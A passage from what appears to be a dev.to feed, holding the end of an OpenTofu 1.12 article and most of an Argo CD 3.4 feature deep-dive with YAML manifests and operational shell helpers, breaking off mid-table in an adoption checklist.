&lt;tr&gt;
&lt;td&gt;Identity import / checksum automation&lt;/td&gt;
&lt;td&gt;1.12&lt;/td&gt;
&lt;td&gt;schema-based import, full hashes in one init&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done when&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Bump staging root module to 1.12.0, review lock-file diff after first &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;h1 &amp;amp; zh hashes auto-added confirmed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Parameterize &lt;code&gt;prevent_destroy&lt;/code&gt; in shared DB/storage modules (default true)&lt;/td&gt;
&lt;td&gt;Module owners&lt;/td&gt;
&lt;td&gt;prod=protected, dev=off controlled by caller&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;destroy = false&lt;/code&gt; to legacy resources to keep but unmanage&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;0 destroys in plan, remote object preserved&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Re-organize composite-key resources (SSM targets, etc.) via identity import&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;deterministic import via import block + for_each&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Remove the manual &lt;code&gt;tofu providers lock&lt;/code&gt; step from CI&lt;/td&gt;
&lt;td&gt;DevOps&lt;/td&gt;
&lt;td&gt;init alone verifies cache/mirror&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Stream apply events to the internal dashboard via &lt;code&gt;-json-into&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;live execution progress displayed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Inventory WinRM provisioners -&amp;gt; OpenSSH migration roadmap&lt;/td&gt;
&lt;td&gt;Infra&lt;/td&gt;
&lt;td&gt;0 winrm uses before v1.13&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. Conclusion — "The Next IaC Challenge Isn't Creation, It's Lifecycle"
&lt;/h2&gt;

&lt;p&gt;If I had to sum up OpenTofu 1.12.0 in one line: &lt;strong&gt;"creating resources is a solved problem; what remains is the lifecycle operations of protecting them differently per environment, detaching them safely, importing them accurately, and not fighting lock files."&lt;/strong&gt; Dynamic &lt;code&gt;prevent_destroy&lt;/code&gt; lets you control delete protection per environment from a single module. &lt;code&gt;destroy = false&lt;/code&gt; keeps the intent of "unmanage but preserve" in code. Identity import ends the era of guessing IDs. Checksum automation strips the manual &lt;code&gt;tofu providers lock&lt;/code&gt; out of CI. And &lt;code&gt;-json-into&lt;/code&gt; elevates IaC execution into an observable pipeline.&lt;/p&gt;

&lt;p&gt;Three closing recommendations. (1) &lt;strong&gt;Review the lock-file diff on the first init after upgrading&lt;/strong&gt; — a bulk addition of h1 hashes is normal, and committing it makes cache/mirror friction disappear. (2) &lt;strong&gt;Parameterize prevent_destroy in shared modules&lt;/strong&gt; — the change that cuts deletion accidents most for the least code. (3) &lt;strong&gt;If you use WinRM provisioners, inventory them now&lt;/strong&gt; — the v1.13 removal is not "optional" but a "scheduled deadline." The shortest one-liner: &lt;em&gt;"this sprint, bump staging to 1.12, turn the shared DB module's prevent_destroy into a variable, and run plans on both prod and dev once."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1483465" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>devops</category>
      <category>cloud</category>
      <category>aws</category>
    </item>
    <item>
      <title>Argo CD 3.4 Deep Dive: Cluster Pause Reconciliation, Helm valueFiles Globs &amp; Source Hydrator Commit Authorship</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Mon, 01 Jun 2026 22:32:04 +0000</pubDate>
      <link>https://dev.to/x4nent/argo-cd-34-deep-dive-cluster-pause-reconciliation-helm-valuefiles-globs-source-hydrator-commit-3195</link>
      <guid>https://dev.to/x4nent/argo-cd-34-deep-dive-cluster-pause-reconciliation-helm-valuefiles-globs-source-hydrator-commit-3195</guid>
      <description>&lt;p&gt;Anyone who has moved GitOps from demo to production knows the hard part isn't &lt;em&gt;deploying&lt;/em&gt; — it's everything after, the so-called &lt;strong&gt;Day-2 operations&lt;/strong&gt;. An incident hits at midnight, but the Argo CD controller keeps stubbornly reconciling everything back to its "desired state." Your &lt;code&gt;values&lt;/code&gt; files have multiplied into dozens per environment and you'd kill for a single glob. Hydration commits give no clue who authored them. And on dual-stack clusters, mysterious DNS timeouts quietly eat away at the controller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Argo CD 3.4&lt;/strong&gt; (GA in May 2026, first stable tag &lt;code&gt;v3.4.1&lt;/code&gt;) takes direct aim at exactly these operational pains. As the official v3.4.1 release notes put it, the focus of this cycle is Day-2: incident management, alert routing, and Helm template flexibility. This article examines five of 3.4's key features, and the operational problems behind them, from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cluster GitOps setup.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why 3.4 — Quarterly Cadence, Center of Gravity Shifts to Day-2
&lt;/h2&gt;

&lt;p&gt;Some context first. Argo CD ships a minor release &lt;strong&gt;once per quarter (every 3 months)&lt;/strong&gt;, and only the three most recent minor versions get patches. If 3.2 was about UI and performance and 3.3 established the &lt;strong&gt;Source Hydrator&lt;/strong&gt; (the rendered-manifests pattern that hydrates manifests into a separate branch), then 3.4 builds on that and asks: "in production, what do we pause, what do we track, and what do we route?" The feature set was frozen as of &lt;code&gt;v3.4.0-rc2&lt;/code&gt;, GA landed in early May 2026, and patches followed quickly: &lt;code&gt;v3.4.3&lt;/code&gt; arrived on May 28, 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;GA&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Headline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;3.2&lt;/td&gt;
&lt;td&gt;H2 2025&lt;/td&gt;
&lt;td&gt;UI / performance&lt;/td&gt;
&lt;td&gt;UI overhaul, controller perf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3.3&lt;/td&gt;
&lt;td&gt;Early 2026&lt;/td&gt;
&lt;td&gt;Rendered manifests&lt;/td&gt;
&lt;td&gt;Source Hydrator, PreDelete Hooks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3.4&lt;/td&gt;
&lt;td&gt;2026-05&lt;/td&gt;
&lt;td&gt;Day-2 operations&lt;/td&gt;
&lt;td&gt;Cluster pause, Helm globs, hydrator commit author, AppSet Watch, gRPC DNS TXT off&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;3.4 is an &lt;strong&gt;operations-hardening release with few breaking changes&lt;/strong&gt;, but the environment changes covered in section 7 must be checked before upgrading. First, the new features.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Per-Cluster Pause Reconciliation — A New Standard for Incident Response
&lt;/h2&gt;

&lt;p&gt;Until now, "pausing reconciliation" in Argo CD worked per application (switching an &lt;code&gt;Application&lt;/code&gt;'s sync policy to manual, or applying a sync window). The problem: the unit of an incident is often &lt;strong&gt;an entire cluster&lt;/strong&gt;. When a target cluster is unstable but the controller keeps pushing hundreds of its apps toward desired state, unintended rollbacks and redeploys pile up in the middle of the outage and make things worse.&lt;/p&gt;

&lt;p&gt;3.4 introduces an annotation that &lt;strong&gt;pauses reconciliation for an entire cluster&lt;/strong&gt; (PR #26442). Add the pause annotation to the cluster secret (or target resource) and the controller stops attempting reconciles against that cluster. It's exactly "hitting the brakes at the cluster level."&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Add the pause annotation to a cluster secret -&amp;gt; reconcile halts for that cluster&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster-prod-apac&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argocd&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;argocd.argoproj.io/secret-type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# WARNING: pausing only stops "automatic convergence to desired state."&lt;/span&gt;
    &lt;span class="c1"&gt;# Already-running workloads keep running, and drift can accumulate.&lt;/span&gt;
    &lt;span class="na"&gt;argocd.argoproj.io/pause-reconciliation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Opaque&lt;/span&gt;
&lt;span class="na"&gt;stringData&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;prod-apac&lt;/span&gt;
  &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://k8s-prod-apac.internal:6443&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Ops tip: read pause as "observation continues, only auto-convergence stops." Drift accumulates during the incident, so right after un-pausing, always inspect the diff first and sync only the intended changes.&lt;/p&gt;
&lt;/blockquote&gt;
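&lt;p&gt;For the incident runbook, the pause can be wrapped in two small shell helpers. This is a sketch: &lt;code&gt;pause_cluster&lt;/code&gt; and &lt;code&gt;resume_cluster&lt;/code&gt; are hypothetical names, the annotation key is the one used in the Secret above, and the cluster secret is assumed to live in the &lt;code&gt;argocd&lt;/code&gt; namespace. Setting &lt;code&gt;KUBECTL=echo&lt;/code&gt; prints the commands instead of running them, which is handy for rehearsals.&lt;/p&gt;

```shell
# Annotation key as used in the cluster Secret example above.
PAUSE_ANNOTATION="argocd.argoproj.io/pause-reconciliation"

pause_cluster() {
  # $1 = cluster secret name; --overwrite makes repeated calls idempotent
  ${KUBECTL:-kubectl} annotate secret "$1" -n argocd \
    "$PAUSE_ANNOTATION=true" --overwrite
}

resume_cluster() {
  # kubectl removes an annotation when the key is suffixed with "-"
  ${KUBECTL:-kubectl} annotate secret "$1" -n argocd "$PAUSE_ANNOTATION-"
}
```

&lt;p&gt;During an incident, run &lt;code&gt;pause_cluster cluster-prod-apac&lt;/code&gt;; once the cluster is stable, run &lt;code&gt;resume_cluster cluster-prod-apac&lt;/code&gt; and, per the tip above, review &lt;code&gt;argocd app diff&lt;/code&gt; output for the affected apps before syncing. Removing the annotation rather than setting it to &lt;code&gt;"false"&lt;/code&gt; is a choice of this sketch, not a documented requirement.&lt;/p&gt;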

&lt;h2&gt;
  
  
  3. Helm valueFiles Wildcard Globs — Taming the values File Explosion
&lt;/h2&gt;

&lt;p&gt;Run multiple environments across multiple regions and your &lt;code&gt;values&lt;/code&gt; files multiply quickly: &lt;code&gt;values-base.yaml&lt;/code&gt;, &lt;code&gt;values-prod.yaml&lt;/code&gt;, &lt;code&gt;values-prod-apac.yaml&lt;/code&gt;, &lt;code&gt;values-feature-x.yaml&lt;/code&gt;… Previously you had to list each one in &lt;code&gt;valueFiles&lt;/code&gt;, and every new file meant editing the Application manifest too.&lt;/p&gt;

&lt;p&gt;3.4 supports &lt;strong&gt;wildcard glob patterns&lt;/strong&gt; in &lt;code&gt;valueFiles&lt;/code&gt; (PR #26768, cherry-picked to 3.4 as #26919). Get your directory convention right and you can pull in "every environment file under &lt;code&gt;values/&lt;/code&gt;" with a single line.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argoproj.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Application&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argocd&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;repoURL&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://git.internal/manoit/payments-chart&lt;/span&gt;
    &lt;span class="na"&gt;targetRevision&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;main&lt;/span&gt;
    &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;chart&lt;/span&gt;
    &lt;span class="na"&gt;helm&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;valueFiles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;values/base.yaml&lt;/span&gt;
        &lt;span class="c1"&gt;# 3.4: collect env values via glob (sort order = merge order)&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;values/prod-*.yaml"&lt;/span&gt;
  &lt;span class="na"&gt;destination&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://kubernetes.default.svc&lt;/span&gt;
    &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;WARNING:&lt;/strong&gt; globs merge matched files in sorted order. Because Helm lets later values override earlier ones, control merge precedence explicitly with filename prefixes (e.g. &lt;code&gt;10-&lt;/code&gt;, &lt;code&gt;20-&lt;/code&gt;). In our experience, most "why isn't my prod value taking effect?" questions come down to merge order.&lt;/p&gt;
&lt;/blockquote&gt;
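&lt;p&gt;A snapshot test makes the merge order visible in code review. The sketch below lists the files a glob would match in byte-wise (C locale) order, which is what Go's &lt;code&gt;filepath.Glob&lt;/code&gt; returns; treat that as an assumption about how Argo CD orders matches and confirm it against your version. &lt;code&gt;merge_order&lt;/code&gt; is a hypothetical helper.&lt;/p&gt;

```shell
# Sketch: print the files matched by a valueFiles-style glob, relative to
# the chart directory, in byte-wise order (assumed to equal merge order).
merge_order() {
  dir="$1"       # chart directory (the Application's source path)
  pattern="$2"   # glob relative to dir, e.g. values/prod-*.yaml
  # Let the shell expand the glob, then sort explicitly with LC_ALL=C so
  # the result does not depend on the runner's locale.
  for f in "$dir"/$pattern; do
    [ -e "$f" ] || continue   # no match: the shell leaves the pattern as-is
    printf '%s\n' "${f#"$dir"/}"
  done | LC_ALL=C sort
}
```

&lt;p&gt;Commit the output (for example &lt;code&gt;merge_order chart 'values/prod-*.yaml' &amp;gt; merge-order.snapshot&lt;/code&gt;) and compare it in CI with &lt;code&gt;merge_order chart 'values/prod-*.yaml' | diff merge-order.snapshot -&lt;/code&gt;. Byte-wise order also explains a common surprise: &lt;code&gt;prod-9-extra.yaml&lt;/code&gt; sorts after &lt;code&gt;prod-20-region.yaml&lt;/code&gt; and therefore wins, so zero-pad numeric prefixes (&lt;code&gt;09-&lt;/code&gt;, &lt;code&gt;10-&lt;/code&gt;, &lt;code&gt;20-&lt;/code&gt;).&lt;/p&gt;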

&lt;p&gt;3.4 also added the ability to send &lt;strong&gt;custom User-Agent headers&lt;/strong&gt; for Helm repository requests (PR #25473) — handy when an internal artifact proxy or OCI registry requires client identification.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Source Hydrator — Commit Authorship and UI Integration
&lt;/h2&gt;

&lt;p&gt;The Source Hydrator that landed in 3.3 is a first-class implementation of the rendered-manifests pattern: it renders the source (dry source) kept in Git and commits it to a separate hydrated branch. Put it into production, though, and one thing grates immediately — &lt;strong&gt;every hydration commit has the same anonymous author&lt;/strong&gt;, rendering audit logs and &lt;code&gt;git blame&lt;/code&gt; meaningless.&lt;/p&gt;

&lt;p&gt;3.4 makes the &lt;strong&gt;authorName/Email used for hydration commits configurable&lt;/strong&gt; (PR #25746). Each hydration commit can then record which environment or bot produced it, restoring audit trails and accountability. After applying the setting, you can verify the identity straight from the hydrated branch's commit log.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the hydrated branch's commit author is stamped with the bot identity&lt;/span&gt;
&lt;span class="c"&gt;# (Source Hydrator renders the dry source and commits it to a separate hydrated branch)&lt;/span&gt;
git fetch origin environments/prod
git log origin/environments/prod &lt;span class="nt"&gt;--pretty&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'%h | %an &amp;lt;%ae&amp;gt; | %s'&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; 5

&lt;span class="c"&gt;# Expected output - before authorName/Email is set: anonymous/identical author&lt;/span&gt;
&lt;span class="c"&gt;#   3f1a2b9 | argocd &amp;lt;argocd@noreply&amp;gt; | hydrate: payments @ a1b2c3d&lt;/span&gt;
&lt;span class="c"&gt;# After: environment/bot identity is clearly distinguished&lt;/span&gt;
&lt;span class="c"&gt;#   9c8d7e6 | argocd-hydrator-prod &amp;lt;gitops-bot+prod@manoit.co.kr&amp;gt; | hydrate: payments @ a1b2c3d&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
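&lt;p&gt;The manual check above can be automated in CI. The sketch below, with the hypothetical helper &lt;code&gt;check_hydrator_author&lt;/code&gt;, fails if any of the last N commits on the hydrated branch has an author e-mail other than the expected bot identity; the branch and e-mail are the illustrative values from the example, not Argo CD defaults.&lt;/p&gt;

```shell
# Sketch: report (and fail on) recent commits on a hydrated branch whose
# author e-mail differs from the expected bot identity.
check_hydrator_author() {
  ref="$1"            # e.g. origin/environments/prod
  expected="$2"       # e.g. gitops-bot+prod@manoit.co.kr
  n="${3:-20}"        # number of recent commits to inspect
  # %h = short hash, %ae = author e-mail
  git log -n "$n" --format='%h %ae' "$ref" |
    awk -v want="$expected" '
      $2 != want { print "unexpected author: " $0; bad = 1 }
      END { exit bad }
    '
}
```

&lt;p&gt;For example, after &lt;code&gt;git fetch origin environments/prod&lt;/code&gt;, run &lt;code&gt;check_hydrator_author origin/environments/prod gitops-bot+prod@manoit.co.kr 50&lt;/code&gt;. Commits made before the setting was applied still carry the old author, so choose N to cover only commits made after the change.&lt;/p&gt;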



&lt;p&gt;On top of that came UI integration — you can enable the hydrator from the app-create panel (#26485) and view hydrator properties directly in the Summary tab (#26152). On the stability side, &lt;code&gt;GetDrySource()&lt;/code&gt; was fixed to preserve all source-type fields (cherry-pick #27189→#27196), and a batch of 3.3-era hydrator bugs (missing hydrated SHA on no-ops, missing creds) were cleaned up.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;3.4 change&lt;/th&gt;
&lt;th&gt;Operational effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Commit metadata&lt;/td&gt;
&lt;td&gt;authorName/Email configurable (#25746)&lt;/td&gt;
&lt;td&gt;Restores audit log / blame&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UI&lt;/td&gt;
&lt;td&gt;Hydrator toggle in create panel (#26485), Summary tab exposure (#26152)&lt;/td&gt;
&lt;td&gt;Config visibility, fewer mistakes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;GetDrySource field preservation, no-op SHA/creds fixes&lt;/td&gt;
&lt;td&gt;Higher hydration reliability&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  5. ApplicationSet Operability — Health Field, Watch, listResourceEvents
&lt;/h2&gt;

&lt;p&gt;The real unit of large-scale GitOps isn't a single &lt;code&gt;Application&lt;/code&gt; — it's the &lt;strong&gt;ApplicationSet (AppSet)&lt;/strong&gt;. In a structure that stamps out tens to hundreds of apps at once via cluster/directory/Git generators, 3.4 elevates AppSet into a first-class, operable object.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Health field added to status&lt;/strong&gt; (#25753) — read overall AppSet health directly from status, no need to manually aggregate hundreds of child apps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ApplicationSet Watch API&lt;/strong&gt; (#26409) and &lt;strong&gt;listResourceEvents API&lt;/strong&gt; (#25537) — standard APIs to stream/query AppSet changes and events. External dashboards and automation attach via watch instead of polling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Controller performance/correctness&lt;/strong&gt; — the path that fetches cluster secrets was optimized, and AppSets in disallowed namespaces no longer trigger unnecessary reconciles on cluster-secret changes (#25622). A DuckType generator panic on non-string values was also fixed (cherry-pick #27265→#27526).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The UI gained an AppSet slide-out summary, a tree-view detail page, and a list page, completing the "operate AppSets visually" experience.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Notification &amp;amp; Networking — appProject Access and gRPC DNS TXT Opt-Out
&lt;/h2&gt;

&lt;p&gt;Notifications are also core to Day-2. 3.4 lets notification templates &lt;strong&gt;access appProject information&lt;/strong&gt; (#26470) — so you can put "which project's app failed to sync" directly into the alert body, sharpening routing accuracy. It also &lt;strong&gt;exposes the notifications controller's processors count as a command parameter&lt;/strong&gt; (#26798) to tune throughput in high-volume alert environments.&lt;/p&gt;

&lt;p&gt;The most operationally relevant networking change is &lt;strong&gt;disabling gRPC service-config DNS TXT lookups by default&lt;/strong&gt; (#26077). It looks small but the root cause runs deep — in dual-stack (IPv4+IPv6) Kubernetes environments, gRPC clients excessively queried DNS TXT records looking for service config, causing timeouts and latency. 3.4 turns that lookup off by default, improving controller stability on dual-stack clusters.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you've experienced "Argo CD intermittently slowing down" on a dual-stack cluster, the 3.4 upgrade alone may make the symptom disappear. Because this is the new default, no extra configuration is required.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  7. Upgrade Watch-Outs — Helm 3.19 K8s Version Interpretation, Dex 2.45, MS Teams O365 Connectors
&lt;/h2&gt;

&lt;p&gt;3.4 is an operations-hardening release with a light migration burden, but check these three before upgrading.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Change&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Helm 3.19.0&lt;/td&gt;
&lt;td&gt;How Helm interprets the K8s cluster version changed → Argo CD aligns to it&lt;/td&gt;
&lt;td&gt;Regression-test charts that depend on &lt;code&gt;.Capabilities.KubeVersion&lt;/code&gt; rendering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dex 2.45.0&lt;/td&gt;
&lt;td&gt;Bundled Dex version upgrade (SSO)&lt;/td&gt;
&lt;td&gt;Validate Dex connector config / OIDC flow in staging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MS Teams notifications&lt;/td&gt;
&lt;td&gt;Microsoft deprecates and removes legacy Office 365 Connectors&lt;/td&gt;
&lt;td&gt;Migrate Teams webhook delivery to the new mechanism&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;WARNING:&lt;/strong&gt; if you were sending Teams notifications via O365 Connector webhooks, this is not "optional" but "required." Microsoft's deprecation breaks the existing path, so alert delivery itself may stop independent of the 3.4 upgrade.&lt;/p&gt;
&lt;/blockquote&gt;
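&lt;p&gt;For the Helm 3.19 row in the table above, a render diff is a cheap regression test. This sketch assumes both the current and the new Helm binary are available (paths passed through the hypothetical &lt;code&gt;HELM_OLD&lt;/code&gt; and &lt;code&gt;HELM_NEW&lt;/code&gt; variables; the release name &lt;code&gt;regress&lt;/code&gt; is arbitrary) and renders the same chart against the same Kubernetes version with &lt;code&gt;helm template --kube-version&lt;/code&gt;. An empty diff means no rendering change for that version.&lt;/p&gt;

```shell
# Sketch: render a chart with two Helm binaries for the same Kubernetes
# version and show a unified diff. Returns 0 if the renders are identical.
render_diff() {
  chart="$1"          # path to the chart directory
  kube_version="$2"   # e.g. 1.31.0
  old_out=$(mktemp)
  new_out=$(mktemp)
  "${HELM_OLD:-helm}" template regress "$chart" \
    --kube-version "$kube_version" > "$old_out"
  "${HELM_NEW:-helm}" template regress "$chart" \
    --kube-version "$kube_version" > "$new_out"
  # diff exits 0 when the renders are identical and 1 when they differ
  diff -u "$old_out" "$new_out"
  status=$?
  rm -f "$old_out" "$new_out"
  return "$status"
}
```

&lt;p&gt;For example, with hypothetical install paths: &lt;code&gt;HELM_OLD=/opt/helm-3.18/helm HELM_NEW=/opt/helm-3.19/helm render_diff ./chart 1.31.0&lt;/code&gt;. This exercises only &lt;code&gt;helm template&lt;/code&gt;; Argo CD may pass additional flags, so treat a clean diff as a necessary rather than sufficient check.&lt;/p&gt;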

&lt;h2&gt;
  
  
  8. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Upgrade to 3.4.x in staging, reflect non-HA→HA manifest diffs&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All apps Synced/Healthy post-upgrade&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Helm 3.19 K8s version interpretation — regression-test KubeVersion-dependent charts&lt;/td&gt;
&lt;td&gt;Chart owners&lt;/td&gt;
&lt;td&gt;Render diff = 0 (excl. intended changes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
